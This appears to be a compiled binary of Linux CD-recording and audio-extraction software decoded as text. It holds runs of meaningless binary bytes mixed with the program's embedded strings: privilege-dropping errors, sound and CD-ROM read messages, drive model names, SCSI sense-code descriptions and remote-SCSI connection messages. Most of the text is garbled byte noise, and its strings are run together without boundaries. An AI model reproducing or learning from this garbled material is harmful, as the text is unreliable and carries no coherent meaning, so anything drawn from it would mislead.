ōS6r&0vfVF[z8׼HXhx@a(#8َHi +ZJzjqP 3:*˿yX;l|L\",<` A* hI~n^N>2.Qp:Yxʱ -No0 P%@Fpg`ڳ=^"25BRwbVr˥nO, 4$ftGd$TDۧ_~<&6WfvvF4VLm/ș鉊DXeHx'h8(}\?؛uJTZ7jz *:.lMͪɍ&|ld\EL<, >]|ߛُn6~UNt^.> @ )2:CJRZclu} !)2;CLS[clu~ #+Fatal error: initsecurity() not called. Fatal error: did not drop group privilege. Fatal error: did not get group privilege. Fatal error: did not drop root privilege. Fatal error: require root privilege but not setuid root. Fatal error: did not get root privilege. Warning: setuid but not to root (uid=%ld, euid=%d) Dropping setuid privileges now. setgid in neverneedgroup()setegid in dontneedgroup()setegid in needgroup()setuid in neverneedroot()seteuid in dontneedroot()seteuid in needroot()request defined buff:ringbuff.cparent writer sem request failed child reader sem request failed (((*total_segments_read) - (*total_segments_written))) <= total_buffers*he_fill_buffer != ((void *)0)previous_read_buffer != *he_fill_bufferprevious_read_buffer != ((void *)0)(total_buffers - ((*total_segments_read) - (*total_segments_written))) < total_buffers(((*total_segments_read) - (*total_segments_written))) > 0((*total_segments_read) - (*total_segments_written)) < total_buffersoccupy_bufferdrop_bufferdefine_bufferget_he_fill_bufferget_previous_read_bufferselect failedcant write audioCannot get blocksize for %s Cannot sync for %s fatal error:Cannot set mono mode for %s Cannot open sound device '%s' Cannot get input buffersize for %s sound format (%d bits signed) is not available Cannot set %d bits/sample for %s Cannot set stereo mode for %s Cannot set rate %d.%2d Hz for %s sound device: next best sample rate is %d Athe SCSI transfer buffer has already been allocated! could not get SCSI transfer buffer! Read Full TOC MMC failed (probably not supported). Read Full TOC Sony failed (probably not supported). ReadSubQSCSI: unknown format %d Read TOC CD Text failed (probably not supported). Read TOC CD Text data (length %hd)...Read TOC CD Text data failed (probably not supported). Cannot allocate memory for inquiry command in line %d speed select PhilipsCDD2600 failed ReadSony12 CDDA + 96 byte SubChannels... ReadSony12 CDDA + SubChannels... Read TOC tracks (standard MSF)... Read TOC tracks (standard LBA)...Read TOC tracks (lba) failed. Cannot allocate memory for mode sense command in line %d get density and sector size...get_orig_sectorsize mode sense failed set density/sector size (EnableCddaModeSelect)... set density and sector size... play sectors...play sectors stop audio play test unit ready...test unit ready speed select NEC...speed select NECspeed select NEC failed Read Full TOC MMC...read full toc mmc Read Full TOC Sony ...read full toc sony Read Subchannel...Read Subchannel Read Subchannel_dumb...Read Subchannel_dumbRead SubQ failed Read TOC CD Text size ...read toc size (text)read toc data (text)inquiryInquiry Data : speed select MMC...set cd speedspeed select MMC failed speed select Yamaha...speed select Yamaha failed speed select Sony...speed select Sony failed speed select Philips... speed select Toshiba...speed select Toshiba failed ReadMMC12 CDDA + SUB...ReadCD Sub MMC 12Read12SubChannelsSony ReadMMC12 CDDA...ReadCD MMC 12 ReadMatsushita12 CDDA...Read12Matsushita ReadSony12 CDDA...Read12 ReadNEC10 CDDA...Read10 NECCD_DATACDDA ReadStandard10 %s (%u)...ReadStandard10 Read TOC size (standard)...read toc sizeRead TOC size failed. read toc tracks Audio mode switch failed setting sector size failed P$$$$$$$$$$$$$PPPPPP$$$$$$$$$PP %s: %5d kB/s (CD %3ux, DVD %2ux) Device seems to be: Adaptec 4000/4010/4070Adaptec 4000Adaptec 4010Adaptec 4070Adaptec 5500Adaptec 4520AAdaptec 4525Emulex MD21Emulex MD23Generic NON CCS DiskGeneric CCS DiskSony SMO-C501Emulex MT02Sysgen SC4000Maxtor RXT800SBerthold HR-ScannerMicrotek MS300AGeneric CD-ROMGeneric mmc CD-ROMGeneric mmc CD-RGeneric mmc CD-RWGeneric mmc2 DVD-ROMGeneric mmc2 DVD-R/DVD-RWPhilips old CDD-521Philips CDD-521Philips CDD-522Kodak PCD-600Philips CDD-2000Philips CDD-2600Yamaha CDR-100Yamaha CDR-400Plasmon RF-4100Sony CDU-924SRicoh RO-1060CRicoh RO-1420CTeac CD-R50SMatsushita CW-7501Matsushita CW-7502Pioneer DW-S114XPioneer DVD-R S101Missing Entry for dev %dSectorsize: %ld Bytes Device type : Version : %d Response Format: %d Capabilities : AENC TERMIOP RELADR WBUS32 WBUS16 SYNC LINKED CMDQUE SOFTRESET Vendor_info : '%.8s' Identifikation : '%.16s' Revision : '%.4s' capacity_not_setread_g1read_g0blank unitread buffer capBFree: %ld K BSize: %ld K send_cue_sheetread master cueclose track/sessionread track infosend opcread dvd structurereserve_track_rzonereserve trackread disk inforead headerread tocSession info too big. Cannot read TOC header read subchannelwrite_bufferread bufferflush cacheseek_g1seek_g0write_g5write_g1write_g0qic 02set streamingscsi_set_streamingstart/stop unitprevent/allow medium removalmedium load/unloadread capacityrequest_senserezero unittocheader: mode sense g1Mode Sense Datamode sense g0SaveSet %s Mode Parametersmode select g1Mode Sense Data (converted)TOC data: ENT: B0: B0 start: %ld B0 lout: %ld Cannot read TOC Cannot read CD-Text header CD-Text len: %d Cannot read CD-Text wctbcdtext.datmode select g0CD capabilitiescaddythisTry to load media by hand. Density: 0x%X Blocks: %ld Blocklen:%ld Pages: 0x%X Drive capabilities, per MMC-3 MMC-2 MMC page 2A: not read CD-R media Does %s%s write CD-R mediaread CD-RW mediawrite CD-RW mediaread DVD-ROM mediaread DVD-R mediawrite DVD-R mediaread DVD-RAM mediawrite DVD-RAM mediasupport test writingread Mode 2 Form 1 blocksread Mode 2 Form 2 blocksread digital audio blocksread multi-session CDsread CD bar coderead R-W subcode informationreturn CD ISRC informationsupport C2 error pointersdeliver composite A/V dataplay audio CDs %s: %d send digital data LSB-firstLength of data in BCLKs %s: %s Loading mechanism type Is %s%s support changing side of diskMaximum read speedCurrent read speedMaximum write speedCurrent write speedRotational control selectedBuffer size in KB Write speed # %d:Inquiry Data : EMULEXADAPTECACB-4520ACB-4525RXT-800SACERCR-4020CCREATIVECDR2000GRUNDIGJVCXR-W2001XR-W2010R2626MITSBISHMITSUMIOPTIMACD-R 650CDD521/00CDD521/02CDD521CDD522PCD225KHSW/OBCDR-240CDD20CDD26C4324/C4325CD-Writer 6020PINNACLERCD-1000RCD5020RCD5040RCD 4X4PIONEERCD-WO DW-S114XCD-WO DR-R504XDVD-R DVR-S101RF4100CDR4220CD-R PX-R24CSRO1060CSAFCD-R2004CD-R2006 CD-R2006PLUSCD-RW226CD-R4012SANYOCD-WO CRD-R24SCD-R CDU92CD-R CDU94TEACCD-R55STRAXDATATraxdataCDR4120T.YUDENCD-WO EW-50WPICDR-632PCDR10CDR200CDR400CD-R CW-7501CD-R CW-7502CDS615EBERTHOLDCLV/PCAVreserved(2)reserved(3)traypop-updisc changercartridge changerreserved(6)reserved(7)32162424 (I2S)Capacity: %ld Blocks = %ld kBytes = %ld MBytes = %ld prMB Mode Parameters (un-converted)Cannot load media with %s drive! restart non-streamed digital audio reads accuratelysupport Buffer-Underrun-Free recordingread fixed-packet CD media using Method 2return R-W subcode de-interleaved and error-correctedread raw P-W subcode data from lead inreturn CD media catalog numberNumber of volume control levelssupport individual volume control setting for each channelsupport independent mute setting for each channelsupport digital output on port 1support digital output on port 2set LRCK high for left-channel datahave valid data on falling edge of clocksupport ejection of CD via START/STOP commandlock media on power up via prevent jumperallow media to be locked in the drive via PREVENT/ALLOW commandcurrently in a media-locked statehave load-empty-slot-in-changer featuresupport Individual Disk Present featureCopy management revision supported Number of supported write speeds: %d error: %d scb.chk: %d sense_count: %d sense.code: 0x%x :zDMb?7857(2(27  $1CO[^ad ATIP start of lead in: %ld (%02d:%02d/%02d) ATIP start of lead out: %ld (%02d:%02d/%02d) Warning: using default %s data. Warning: controller creates hard SCSI failure when retrieving %s page. Warning: controller returns zero sized %s page. Warning: controller returns wrong size for %s page. Warning: controller returns wrong page %X for %s page (%X). Warning: controller does not support %s page. Mode Select DataMode Page DataCannot get %s data. Cannot get %s mask. Cannot get default %s data. Cannot get saved %s data. StopPlay_cooked (CDROMSTOP)... EnableCdda_cooked (CDIOCSETCDDA)... non audio sector size is ignored. EnableCdda_cooked (CDIOCSETCDDA) is not available... Play_at_cooked (CDROMSTART & CDROMPLAYMSF)... (%u-%u)SpeedSelect_cooked (CDROM_SELECT_SPEED)... Please run this program setuid root. can't set speed %d (error %d). ReadCdRom_cooked (CDROMREADAUDIO)... Sorry, this driver and/or drive does not support cdda reading. sector %u + %u, buffer %p + %x can't read frame #%u (error %d). ReadSubQ_cooked (CDROM_GET_MCN or CDROMSUBCHNL)... can't read sub q channel (error %d). ReadToc_cooked (CDROMREADTOCHDR)... can't get TocHeader (error %d). can't get TocEntry #%d msf (error %d). can't get TocEntry LEADOUT msf (error %d). can't get TocEntry #%d lba (error %d). can't get TocEntry LEADOUT lba (error %d). ReadCdRomData_cooked (lseek & read)... cooked: Speed select cooked: Read cdda cooked: Read subq cooked: Read TOC cannot seek sectorcannot read sectorcannot stat cd %d (%s) ioctl(CDROMAUDIOBUFSIZ)ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._/etc/cdrecord.confCDR_DEVICECDR_DEVICE=,:/@%s=Bad fifo size in defaults. ""CDR_SPEEDCDR_SPEED=Bad speed environment. CDR_FIFOSIZECDR_FIFOSIZE=Bad fifo size environment. Value %lld is too large for data type 'long'. Lost connection to remote host ?? Warning: Using remote SCSI interface. Illegal value for busno, target or lun '%d,%d,%d'who are you? No passwd entry found. locuser: '%s' rscsiuser: '%s' host: '%s' rcmdsh: fork to lose parent failed. Cannot get connection to remote hostRemote status(%s): %d '%s'. Protocol error (got %s). R%d isatapiinitiator idI T%d %d %d %d filenoB%d %d havebusD%ld maxdmaS%d %d %d %d %d sendcmdfreebufF M%ld getbufsndsize: %d rcvsize: %d closeV%d versionREMOTEIllegal remote device syntaxshellshell/tcp: unknown service %.*sRSCSI/opt/schily/sbin/rscsiRSHrshUnknown user: %s Cannot create socketpair. dup2 failed. setuid(%lld) failed. seteuid(%lld) failed. -lexeclp '%s' failed. O%s openREMOTE:rscsi@host:1,2,0rscsi@host:bus,target,lunREMOTE:Remote SCSIʃʃʃʃʃʃʃ  %02XSense Bytes:CDB: status: 0x%x RESERVATION CONFLICTReservedCHECK CONDITIONCONDITION MET/GOODBUSYINTERMEDIATE GOOD STATUS host adapter detected error(%s%s) Received Data: Write Data: Removable not present reserved unsupported unsupported vendor specific %d TapePrinterProcessorOptical StorageJuke BoxCommunicationIT8 1IT8 2Storage arrayEnclosure servicesSimple direct accessOptical card r/wBridging expanderObject based storageAutomation/Drive InterfaceWell known lununknown/no deviceunit not presentunknown device type 0x%xretryable errorfatal errorno errorerror: %d%s: scsi sendcmd: %s DMA overrun, resid: %d SCSI ALREADY RUNNING !!YESINTERMEDIATE CONDITION MET/GOODGot %d (0x%X), expecting %d (0x%X) bytes of data. cmd finished after %ld.%03lds timeout %ds Sending %d (0x%X) bytes of data. Executing '%s' command on Bus %d Target %d, Lun %d timeout %ds cmd timeout after %ld.%03ld (%d) sSCSI command name not set by callerCurrently running '%s' command. Cannot send SCSI cmd via ioctl ret < 0 errno: %d ux_errno: %d error: %d ^^(^^^2^^^^^^^<^^^F^^^Pg ߙʙvaL7" Θ|SCSI open usage error. None.scgo_getbuf: %ld bytes schily - Red Hat%d.%d.%dINFO: %s -> %s ERROR: unknow format idesrINFO: l1: 0x%lX l2: 0x%lX ATAPI/dev/cdroms/cdrom*/dev/hd[a-z]ATAPI:INFO: do scgo_open openbydevCannot open '%s'ATAPI:1,2,0sgpgATA:Cannot set SG_SET_TIMEOUT. Cannot open '/dev/hd*'Cannot open '/dev/scd*'/dev/hdPP Bus: %d /dev/pg%d/dev/pg[0-9]/dev/pg[0-9][0-9]Cannot open '/dev/pg*'Bus: %d cookie: %X file (%d,%d,%d): %d /dev/scd[0-9]/dev/scd[0-9][0-9]Can't do %d byte command. ioctl ret: %d No remote SCSI transport available. Target (%d,%d,%d): DMA max %d old max: %ld Bus: %d Target: %d Lun: %d Chan: %d Ino: %d NOT IMPELEMENTED: scgo_initiator_idERROR: with link merging! base %s link %s, result of merging %i ERROR: with link reading! link %s, result of readlink %i EXAMPLE: /dev/scsi/host1/bus2/target3/lun4/cd EXAMPLE: /dev/ide/host0/bus0/target1/lun0/cd EXAMPLE: /dev/hda or /dev/sr0 INFO: Bus: %d Target: %d Lun: %d Chan: %d Ino: %d ERROR: unknow subsystem (%s) in (%s) INFO: subsystem %s: h %i, b %i, t %i, l %iERROR: in scgo_get_first_free_shillybus(...). Too many CDROMs, more than %iIncrease MAX_SCHILLY_HOSTS in scsi-linux-ata.c and recompile!ERROR: this cdrom is already mapped %s(%d,%d,%d) INFO: /dev/%s, (host%d/bus%d/target%d/lun%d) will be mapped on the schilly bus No %d (%d,%d,%d) Warning: Using ATA Packet interface. Warning: The related Linux kernel interface code seems to be unmaintained. Warning: There is absolutely NO DMA, operations thus are slow. Illegal value for bus, target or lun '%d,%d,%d'try open(%s) return %i, errno %i, cancel errno (EACCESS), you don't have the needed rights for %s try open(%s) return %i, errno %i, trying next cdrom try open(%s) return %i errno %i calling sg_mapdev(...) INFO: scan_internal(...) failedATA Packet specific SCSI transportGeneric transport independent SCSISCSI transport for ATAPI over Parallel PortATA Packet specific SCSI transport using sg interfaceLinux sg driver version: %d.%d.%d Warning Linux Bus mapping botch. SCSI Bus: %d (mapped from %d) Use of ATA is preferred over ATAPI. SCSI unsupported with '/dev/hd*'scgo_send(%s) wrote %d bytes (expected %d). DMA (read) overrun by %d bytes (requested %d bytes). DMA addr: 0x%8.8lX size: %d - using copy buffer Allocated DMA copy buffer, addr: 0x%8.8lX size: %ld pack_len: %d, reply_len: %d pack_id: %d result: %d sense[0]: %02X host_status: %02X driver_status: %02X ioctl(CDROM_SEND_PACKET) ret: %d Supported SCSI transports for this platform:Invalid bus or target specifier in '%s'Invalid target or lun specifier in '%s'Invalid value for bus, target or lun (%d,%d,%d)WARNING: device not valid, trying to use default target... scsibus: %d target: %d lun: %d No memory for SCSI structureInvalid lun specifier '%s'Invalid lun specifier in '%s'scsidev: '%s' devname: '%s' scg__open(%s) %d,%d,%d diagnostic failure on component 0x%Xtagged overlapped commands, queue tag is 0x%Xdecompression exception short algorithm id of 0x%X%sSense Key: 0x%X %s%s, Segment %d Sense Code: 0x%02X Qual 0x%02X %s%s%s%s Fru 0x%X error refers to %s part, bit ptr %d %s field ptr %dlogical unit is in process of becoming readylogical unit not ready, initializing cmd. requiredlogical unit not ready, manual intervention requiredlogical unit not ready, format in progresslogical unit not ready, rebuild in progresslogical unit not ready, recalculation in progresslogical unit not ready, operation in progresslogical unit not ready, long write in progress logical unit not ready, self-test in progress asymmetric access code 3 (00-232) [proposed] asymmetric access code 1 (00-232) [proposed] asymmetric access code 2 (00-232) [proposed]auxiliary memory code 2 (99-148) [proposed]logical unit communication time-outlogical unit communication parity errorlogical unit communication crc error (ultra-dma/32) warning - specified temperature exceeded warning - enclosure degraded write error - recovered with auto reallocation write error - auto reallocation failed write error - recommend reassignment compression check miscompare error data expansion occurred during compression write error - recovery needed write error - recovery failed write error - loss of streaming write error - padding blocks added auxiliary memory code 4 (99-148) [proposed] copy target device not reachable incorrect copy target device type copy target device data underrun copy target device data overrununrecovered read error - auto reallocate faileddata re-synchronization error unrecovered read error - recommend reassignment unrecovered read error - recommend rewrite the datacannot decompress using declared algorithmerror reading upc/ean numberread error - loss of streamingauxiliary memory code 3 (99-148) [proposed]filemark or setmark not foundrecord not found - recommend reassignmentrecord not found - data auto-reallocatedmechanical positioning errorpositioning error detected by read of mediumdata sync error - data rewrittendata sync error - recommend rewritedata sync error - data auto-reallocateddata sync error - recommend reassignmentrecovered data with positive head offsetrecovered data with negative head offsetrecovered data with retries and/or circ appliedrecovered data using previous sector idrecovered data without ecc - data auto-reallocatedrecovered data without ecc - recommend reassignmentrecovered data without ecc - recommend rewrite recovered data without ecc - data rewrittenrecovered data with error corr. & retries appliedrecovered data - data auto-reallocatedrecovered data - recommend reassignmentrecovered data - recommend rewriterecovered data with ecc - data rewrittendefect list error in primary listdefect list error in grown listprimary defect list not found access controls code 1 (99-314) [proposed] access controls code 2 (99-314) [proposed] access controls code 3 (99-314) [proposed] read type operation while in write capable state write type operation while in read capable state illegal command while in explicit address model illegal command while in implicit address model access controls code 5 (99-245) [proposed] access controls code 6 (99-245) [proposed] access controls code 7 (99-245) [proposed] access controls code 8 (99-245) [proposed]$invalid cdb field while in explicit block address model$invalid cdb field while in implicit block address model&threshold parameters not supported&invalid release of persistent reservation&unsupported target descriptor type code&too many segment descriptors& unsupported segment descriptor type code& invalid operation for copy source or destination& copy segment granularity violation'logical unit software write protected(import or export element accessed)bus device reset function occurred)transceiver mode changed to single-ended)transceiver mode changed to lvd*asymmetric access code 6 (00-232) [proposed]*asymmetric access code 7 (00-232) [proposed],invalid combination of windows specified,current program area is not empty,current program area is empty,illegal power condition request0cannot read medium - unknown format0cannot read medium - incompatible format0cleaning cartridge installed0cannot write medium - unknown format0cannot write medium - incompatible format0cannot format medium - incompatible medium0cannot write - application code mismatch0 current session not fixated for append1zoned formatting failed due to spare linking5unsupported enclosure function5enclosure services unavailable5enclosure services transfer failure5enclosure services transfer refused8esn - power management class event8esn - device busy class event:medium not present - tray closed:medium not present - tray open:medium not present - loadable:medium not present - medium auxiliary memory accessible;tape position error at beginning-of-medium;tape position error at end-of-medium;tape or electronic vertical forms unit not ready;failed to sense bottom-of-form; read past beginning of medium; position past beginning of medium; medium destination element full;medium magazine not accessible;mechanical positioning or changer error>logical unit failed self-test>logical unit unable to update self-test log?changed operating definition?redundancy group created or modified? volume set created or modified?reported luns data has changed?medium auxiliary memory accessibleGdata phase crc error detectedGscsi parity error detected during st data phaseGinformation unit crc error detectedGasynchronous information protection error detectedPposition error related to timingQerase failure - incomplete erase operation detectedUinsufficient reservation resourcesUinsufficient registration resourcesUaccess controls code 4 (99-314) [proposed]Uauxiliary memory code 1 (99-148) [proposed]Zoperator medium removal requestZoperator selected write protectZoperator selected write permit]media failure prediction threshold exceeded]logical unit failure prediction threshold exceeded]spare area exhaustion prediction threshold exceeded]hardware impending failure general hard drive failure]hardware impending failure drive error rate too high]hardware impending failure data error rate too high]hardware impending failure seek error rate too high]hardware impending failure too many block reassigns]hardware impending failure access times too high]hardware impending failure start unit times too high]hardware impending failure channel parametrics]hardware impending failure controller detected]hardware impending failure throughput performance]hardware impending failure seek time performance]hardware impending failure spin-up retry count]hardware impending failure drive calibration retry count] controller impending failure general hard drive failure]!controller impending failure drive error rate too high]"controller impending failure data error rate too high]#controller impending failure seek error rate too high]$controller impending failure too many block reassigns]%controller impending failure access times too high]&controller impending failure start unit times too high]'controller impending failure channel parametrics](controller impending failure controller detected])controller impending failure throughput performance]*controller impending failure seek time performance]+controller impending failure spin-up retry count],controller impending failure drive calibration retry count]0data channel impending failure general hard drive failure]1data channel impending failure drive error rate too high]2data channel impending failure data error rate too high]3data channel impending failure seek error rate too high]4data channel impending failure too many block reassigns]5data channel impending failure access times too high]6data channel impending failure start unit times too high]7data channel impending failure channel parametrics]8data channel impending failure controller detected]9data channel impending failure throughput performance]:data channel impending failure seek time performance];data channel impending failure spin-up retry count]logical unit failure>timeout on logical unit?microcode has been changed?inquiry data has changed?component device attached?device identifier changed?redundancy group deleted?spare created or modified? spare deleted? volume set deleted? volume set deassigned? volume set reassigned?echo buffer overwritten?medium loadablePwrite append position errorSunload tape failureSmedium removal preventedUsystem buffer fullUinsufficient resources[threshold condition met[log counter at maximum[log list codes exhausted\spindles synchronized\spindles not synchronized^Bpower state change to idle^Epower state change to sleepaunable to acquire videoaout of focusdinvalid packet sizegadd logical unit failedgassign failure occurrediparity/data mismatchkredundancy level got betterkredundancy level got worsesprogram memory area is fullsrma/pma is almost fullLLLq;&;6;@;M;\;l;{;;;;;;;;xno additional sense informationfilemark detectedend-of-partition/medium detectedsetmark detectedbeginning-of-partition/medium detectedend-of-data detectedi/o process terminatedaudio play operation in progressaudio play operation pausedaudio play operation successfully completedaudio play operation stopped due to errorno current audio status to returnoperation in progresscleaning requestedno index/sector signalno seek completeperipheral device write faultlogical unit not ready, cause not reportablelogical unit does not respond to selectionno reference position foundmultiple peripheral devices selectedlogical unit communication failure track following error error log overflow warning write error error detected by third party temporary initiatorid crc or ecc errorunrecovered read erroraddress mark not found for id fieldaddress mark not found for data fieldrecorded entity not foundrandom positioning errordata synchronization mark errorrecovered data with no error correction appliedrecovered data with error correction applieddefect list errorparameter list length errorsynchronous data transfer errordefect list not foundmiscompare during verify operationrecovered id with ecc correctionpartial defect list transfer invalid command operation code!logical block address out of range"illegal function (use 20 00, 24 00, or 26 00)$invalid field in cdb%logical unit not supported&invalid field in parameter list'write protected(not ready to ready change, medium may have changed)power on, reset, or bus device reset occurred*parameters changed+copy cannot execute since host cannot disconnect,command sequence error-overwrite error on update in place.insufficient time for operation/commands cleared by another initiator0incompatible medium installed1medium format corrupted2no defect spare location available3tape length error4enclosure failure5enclosure services failure6ribbon, ink, or toner failure7rounded parameter8event status notification9saving parameters not supported:medium not present;sequential positioning error=invalid bits in identify message>logical unit has not self-configured yet?target operating conditions have changed@ram failure (should use 40 nn)@diagnostic failure on component nn (80h-ffh)Adata path failure (should use 40 nn)Bpower-on or self-test failure (should use 40 nn)Cmessage errorDinternal target failureEselect or reselect failureFunsuccessful soft resetGscsi parity errorHinitiator detected error message receivedIinvalid message errorJcommand phase errorKdata phase errorLlogical unit failed self-configurationMtagged overlapped commands (nn = queue tag)Noverlapped commands attemptedPwrite append errorQerase failureRcartridge faultSmedia load or eject failedTscsi to host system interface failureUsystem resource failureWunable to recover table-of-contentsXgeneration does not existYupdated block readZoperator request or state change input[log exception\rpl status change]failure prediction threshold exceeded^low power condition on`lamp failureavideo acquisition errorbscan head positioning errorcend of user area encountered on this trackdillegal mode for this trackevoltage faultfautomatic document feeder cover upgconfiguration failurehlogical unit not configuredidata loss on logical unitjinformational, refer to logkstate change has occurredlrebuild failure occurredmrecalculate failure occurredncommand to logical unit failedocopy protection key exchange failure - authentication failurepdecompression exception short algorithm id of nnqdecompression exception long algorithm idrsession fixation errorscd control errorECC error during verifyinterleave errorbad format on driveself test faileddefective track#volume overflow+set limit violation,error counter overflow-initiator detected error.scsi parity error/adapter parity error disk not inserted load/unload failure spindle failure focus failuretracking failurebias magnet failure#illegal function for medium type8recoverable write error9write error recovery failed:defect list update failed=defect list not availablelimited laser lifelaser focus coil over-currentlaser tracking coil over-currenttemperature alarm Transport name: %s Transport descr.: %s Transp. layer ind.: %s Target specifier: %s Target example: %s SCSI Bus scanning: %ssupported Open via UNIX device: %ssupported Error trying to open %s exclusively ... retrying in 1 second. j@>.A?NO MEM333333?%s: %rError %d%s: %s. %rgetarg_bad_formatKXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWkXWWXWWW#Y ZYWWWWWWWWWWWWWWWWWWYany_otherCondition not caught: kkk8kk8k8k8k8k8k8k`k8k8k8k8k8kk8kkVk8kkr+rbwbr+ba+aba+b2YH[][K[N[Q[2YJU[][K[X[[[(NULL POINTER)UCSILCSILZODXudioxX0x0Xt(q(q;t(q(q(q(q(q(q(q/t(q t(q(q#tv$r$r$r$rv$rw$rv$r$r$rvw$rvu s s s s s s s s s s8vu s s s s\u s su st s s s s s s s s s s s s s s s s s s s s su s s s s s s su9y_t_t_t_tTy_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_t_tx_t_t_t_tx_t_t_t_t_tx_t_t[x_t_t_t_t_toy_tx_t_t_t_t_t_t_t~yyxy1zYwwxx_tx_txx;x_t[xx_ty_t_t(y_tx0123456789abcdef0123456789ABCDEF;U(>8>x>>>(h?@?`?x(@H@@@8AAA(xB@CdC|(E8NSxVXx[8(^XXhxH$H`xئXXx,LhȬ8XXpȽ(Hh ȿ8Ph8X(8(X@\|(hXX,DH`,D\(t8((Hhh8x<\x|X)<)T*l*8+H+X+8,, ,, ,D ,\ -t H- - - - x5!H6(!7L!7d!8|!h9!H:!;!(H"(?`"?x"?"(A"A"B"B#HC#G<#GT#Hl#HH#H#I#J#K#L$M<$xNX$Ox$(P$R$(U$V$W%X0%YL%Zl%[%\%]%(_%h_&` &a@&Xb`&c&Hd&he&f&(g&Xg'g4'jT'ot'p'p'q'Hs't(Xu<(uX(up(u(v(x(x(y((z)|8)|P)|h)})(~)))*(*؊L*(h**X***(+8+\+H|+++H+,($,D,d,,,,h,(-ؚ8-XX-|----X-h.4.hT.x.Ƞ.X..H.Ȣ/HH>$>>@>(?`>(A>HB>B>(C>HC>C?C4?ET?hFp?F?G?8G?HG?G?H@8H4@HT@Ht@I@8I@HI@XI@hI@xIAIAI4AILAIdAJ|A8JAXJAxJAJAJA(KBXK(BLHBLdBXOBPBhQB(RBHS CXT,CTDC`dCeCeCfCgChgCh Dk,DxLD{lD؁DD8DHD؇E E(AB ^AB AG AB F mAB I,`AB EL0HAB DhAB F0AB F(-6D  F AB D AH   AG 0AB @ AG 4PKAD LTTAB I t_AB FII`AB p"AB "AB kAB II@CAD yAB D4XAB LpAB dNE |0/AB B` 3AB A DD  AB F ' AB IAB O0AB FPtAB h@AB C9AB ADLAJ `AB p AG ZAB FAG (GB @ AD X@ AG p`AG AG AG #AG AG 6AG P#AG %AG 0 AG HAD ` AB xAH  +AI A@ FAB HF BAB  8AB  !AB AJ""AG 4@"TAB L"eAB d#ZAB |p#FB #kAB D$AB E$AB KFP%eAB FI %uAB E0 @&AB H `& AB Dd &AB | &AB  &AB  &AB  &AB  &AB O 'AB D 'AB H8 p(pAB FEX (|AB AGx `*(AB C .AB FI 0AB F 70AD  75AB A 08 AB I, BAB IL GAB Fl KAB I P_QAD F _zAB LI 0`AB F dAB I uAB I, wAD AIL xUAB Il zAB AJ  AG  AB  AB N fAB D  AG  AB ( AD CH AB Dd AD | AD  AD  AB  1AB  ?AD AC @"AD ACpAD A8AB CX0AB F xAG FFSAB AB `AB  AB AB ЙAB D0AB H-AB `XAB x AAB TpcAB eAB P3AB  FAB LIIAB `AB I<pAB TeAB lZAB E`%AB +CI 9AB AB AB F AB E,`AB ELpAB ElAB AF{AB D0AB AFPAB DAB JJ;AB F$WAB ED@[AB FdAB DAB DAB EAB DpAB F/AB F/AB F8<AB P AB FFpAB Fп7AB F7AB FPAB FLAB F  7AB ACF4`}AB L!AB Ah!AB A@]AB IAB F`gAB JdAB AG @TAB KFF(\AB EHUAB E h`AB IFIMAB D` AG pAB AB EAB F AG 0AB HAB EhaAB FPAB pAB AB HD`~AB BAB DAB E4pOAB E TAB IFF xAB IFFCAB A AB IFFmAB F AB FFF AB FFFDPAB E dAB FFF AB FFF@AB F AB FFF AB FFF PAB IFF81AB  P@AB FFFtAB FAB F`1AB I AB FFF PAB IIU `AB FFF @ AB IFF dAB FIF|AB E AB FFF AB FFF@"AB pAB F(PAB FH AB  ` AB FFFPAB J  AB FFF AB FFF AB FFF AB FIF4@AD LtAB ElzAB EAB E AB FFFpzAB FF{AB EpRAB FF0AB IPAB FppAB F@AB F @ [AB IQF RAB J  .AG IQF 0 AB FFI < AB IL``+AB I0gAB IAB FRAB J AB FFF AB FFF(AB DDrAB D`AB FIeAB I AB IFF AB FFFAB FF `AB I ( !AB IFTL !Q AB Il /.AB O[ @0AB D 0AB I pCOAB FF CAB !CWAB II !@D,AB  8!pDAB GGF\!`E[AG M|!EAB FF!pF1AB F!GvAB I!0NXAB D!N_AB "NAB ("OAB FH"PAB Dd"QAB F"`SAB E"@UmAB I "XAB IFF"YAB D#0[ AB BF$#i?AB <#@isAB F\#j$AB F|#k2AG F#0m?AB L#pmAB #m:AB I#rSAD FG$0u%AB ,$`uhAB OL$u AG d$uLAB |$0v AG $@vAB AI$w[AB A$`wAB AD$x}AB AJ%xAB I[0% zfAB FLP%zAB IIp%{(AB %@{(AB %p{AB IZ%@|AB IW%|AB II&`}AB C &XAB D<&PAB F \&0AB FFH&AB II&AB GF&AB U&MAB &<AB '0AB ('@<AB FFH'CAB FFh'ЍAB D'AB 'AB 'AB ' AB '0AB '@AB (PAB ,(p2AB D(AB \(CAB Dx(6AB D(P:AB D (NAB FFF(#AD (AB F )AB F,)0AB D)?AB \)ZAB F|)`zAB IF)AB LF )AG FFF )0AB IFF *AD FFF(*=AG FFH*Ж^AB Dd*02AB E*pAB *AB F**AB *@nAB F*)AB  +#AB $+*AB <+@(AB T+pAB Lt+fAB D+pdAG E+AB F+AB II+WAB FL,`qAB WI0,AB H,GAG FFh,PAB D,pAB F,PAB D , AB FFF, AG ,0AB - AG ,-XAB BL-`ZAB Pl-*AB -XAB B-PZAB P- AG -0AB -AD  .AB $.AD <.  AG T.0 AG l.@AD .P!AB .!AB .AB .ШAB .AB .AB /0AB ,/PAB D/peAG D`/-AD x/#AB II/@&AB D/pAB F /AB LEF /lAB FFF0 AG F<0AG F\0AB R|0#AB 0@ AB I0PAB F0PMAB 0AB D16AB A$1CFB <1 1AB AJ\1`AB BF|1`0 AB I1AB AJ1AB I1AB FI1PAB II2AB 42AB DP2AB Bp2"AB D2[AB I2@AB I 2TAG FFF2PAB F3`=AB I03JAB EP3AB Fp3AB FF3 AB 3AD 3 AB 3@AB 3`AB 4AD  4AB 84AB P4AB h4AB 4 AB 400AB 4`-AB 4AB 4AB 4\AB D50AB D 05P^AB FFFT5%AB Dp5(AB 5DAB E5` AB 5pFAB D5hAB E50AB 6PYAB F465AB ET64AB Et60AB F6AB QF6qAB FI 6`|AB FFF63AB FF7 AB FL87eAB NX7`AB BFx7AB 7AB 7 AB  7@AB FHE7cAB F 8@ AB IFF(8 *AB DD8 AB Fd8 rAB I8&LAB I8:"AB 8 ;CAB D8p;CAB D8;<AB D9< AB (9<|AB WH9<AB FOh9=AB F9=>AB H90>AB C9?AB C9AGAB 